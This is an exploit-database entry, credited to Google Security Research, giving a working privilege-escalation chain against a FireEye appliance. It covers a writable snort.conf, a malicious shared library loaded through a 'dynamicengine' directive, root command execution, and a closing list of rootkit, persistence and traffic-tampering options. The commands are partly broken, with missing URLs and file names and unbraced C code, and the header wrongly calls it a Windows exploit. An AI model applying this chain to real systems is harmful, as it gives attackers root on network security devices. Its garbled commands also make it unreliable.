FireEye - Malware Input Processor (uid=mip) Privilege Escalation

ID 1337DAY-ID-25550
Type zdt
Reporter Google Security Research
Modified 2016-03-28T00:00:00


Exploit for windows platform in category local exploits

The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:
$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec  2 18:02 /data/snort/config/snort.conf
This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.
# mount | grep -v noexec | grep rw 
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)
It looks like /dev/shm is a good candidate for storing a shared library.
First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:
$ cat test.c 
void __attribute__((constructor)) init(void)
        system("/usr/bin/id > /tmp/output.txt");
$ gcc test.c -shared -s -fPIC -o
Now fetch that object on the FireEye machine, and instruct snort to load it:
fireeye$ curl > /dev/shm/
fireeye$ printf “dynamicengine /dev/shm/\n” >> /data/snort/config/snort.conf
The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:
fireeye$ cat /tmp/output.txt                                                           
uid=0(admin) gid=0(root) groups=0(root)
And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.

# [2018-02-16]  #